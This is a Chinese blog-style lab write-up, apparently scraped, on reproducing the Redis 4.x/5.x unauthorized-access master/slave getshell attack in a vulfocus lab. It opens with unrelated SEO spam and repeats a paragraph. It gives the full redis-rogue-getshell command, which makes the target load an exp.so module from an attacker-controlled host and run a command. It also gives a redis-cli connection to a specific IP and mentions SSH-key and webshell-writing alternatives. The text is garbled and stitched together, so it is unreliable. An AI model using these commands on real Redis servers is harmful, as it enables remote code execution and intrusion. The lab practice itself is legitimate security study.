网站产品策划,网上购物哪个平台质量有保证,苏州网站开发找薇,网站建设及目标1.复现环境与工具
环境是在vulfocus上面
工具#xff1a;GitHub - vulhub/redis-rogue-getshell: redis 4.x/5.x master/slave getshell module
参考攻击使用方式与原理#xff1a;https://vulhub.org/#/environments/redis/4-unacc/
2.复现
需要一个外网的服务器做GitHub - vulhub/redis-rogue-getshell: redis 4.x/5.x master/slave getshell module
参考攻击使用方式与原理https://vulhub.org/#/environments/redis/4-unacc/
2.复现
需要一个外网的服务器做上传这个工具到服务器上进入这个文件夹里面后输入命令 python3 redis-master.py -r 目的ip -p 目的端口 -L 你的ip -P 你开放的端口 -f RedisModulesSDK/exp.so -c id
出了一个file搜了一下是由于这个文件用python3写的要检查一下你的服务器上是不是python版本3.0以上用where python查python的安装位置 ls -l 目录/py* 得到代python的所有文件看有没有python3 他的命令是什么 参考Linux系统安装Python3环境超详细-腾讯云开发者社区-腾讯云
我这里是装了的名称为python3
这个要先根据他github上面的内容去做make之后再运行 python3 redis-master.py -r 目的ip -p 目的端口 -L 攻击者ip -P 对应端口 -f RedisModulesSDK/exp.so -c idredis-cli -h 123.58.224.8 -p 45635 用redis组件去连接上这个redis之后按照我的理解来说应该是用redis写入公钥连接才对
参考redis未授权访问-cnvd 2015-0755漏洞复现 - FreeBuf网络安全行业门户
但是去试的时候发现 好像是环境有点问题没权限了 所以需要用写入web的方法去做要换工具做 要是还是想得到flag的话就参考
未授权漏洞vulfocu靶场实战_vulfocus中redis未授权漏洞如何拿到falg-CSDN博客
vulfocus靶场redis 未授权访问漏洞之CNVD-2015-07557-CSDN博客
我太懒了实在不想重新来过了